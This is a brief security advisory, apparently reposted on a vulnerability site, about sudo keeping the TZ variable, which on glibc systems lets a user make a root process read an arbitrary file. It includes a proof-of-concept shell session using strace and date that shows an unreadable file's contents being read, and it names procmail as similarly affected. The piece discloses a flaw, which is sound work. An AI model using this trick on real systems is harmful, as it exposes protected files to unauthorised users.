Abusing TZ for fun (and little profit)

2014.10.17
Credit: Jakub Wilk
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC: $ echo moo > tz $ chmod 0 tz $ cat tz cat: tz: Permission denied $ TZ=$PWD/tz sudo -u root strace -e read date read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512 read(3, "moo\n", 4096) = 4 read(3, "", 4096) = 0 Wed Oct 15 20:42:42 2014 +++ exited with 0 +++ Procmail is another program that recklessly whitelists TZ[2]. [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189 [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13 -- Jakub Wilk

References:

https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top